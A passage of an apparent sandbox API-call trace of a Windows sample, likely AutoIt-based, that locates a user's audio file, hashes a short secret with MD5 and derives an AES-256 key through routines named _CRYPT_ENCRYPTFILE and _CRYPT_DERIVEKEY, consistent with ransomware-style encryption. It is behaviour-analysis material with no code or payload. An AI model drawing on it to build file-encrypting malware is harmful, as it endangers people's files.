lpString2="flyingship", cchCount2=10) returned 1 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ADuuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Duuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uuj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uj\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xrsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rsN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sN5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DPtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0181.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PtYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tYDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YDsIm.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0181.830] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.830] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0181.830] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0181.830] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.830] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.830] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.830] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.830] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0181.830] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.831] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5e18470, ftCreationTime.dwHighDateTime=0x1d5e62a, ftLastAccessTime.dwLowDateTime=0x2e730940, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0x2e730940, ftLastWriteTime.dwHighDateTime=0x1d5e62f, nFileSizeHigh=0x0, nFileSizeLow=0x675e, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="cxrsN5DPtYDsIm.wav", cAlternateFileName="CXRSN5~1.WAV")) returned 0x90ae18 [0181.831] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0181.831] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.831] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.831] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.831] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.831] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0181.831] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.831] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0181.831] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.831] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.831] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0181.831] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.842] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.842] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.842] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.842] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.842] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0181.842] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.842] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0181.844] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.844] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.844] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0181.844] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.844] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.844] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.844] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.844] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.844] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.844] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.844] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.844] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.844] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.844] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.844] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.844] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0181.844] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.844] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.844] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.844] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.845] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.845] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0181.845] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.845] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.845] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.845] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.845] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.845] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.845] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.845] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.845] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.845] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.845] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.845] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.845] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.845] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0181.845] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.845] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.845] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.845] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.845] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0181.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.846] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.846] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.846] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.846] CryptHashData (hHash=0x90af58, pbData=0x8def38, dwDataLen=0x19, dwFlags=0x1) returned 1 [0181.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.846] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.846] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.846] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.846] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.846] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.846] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0181.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.847] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.847] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.847] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0181.847] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.847] CryptDestroyHash (hHash=0x90af58) returned 1 [0181.847] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.847] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.847] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.847] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 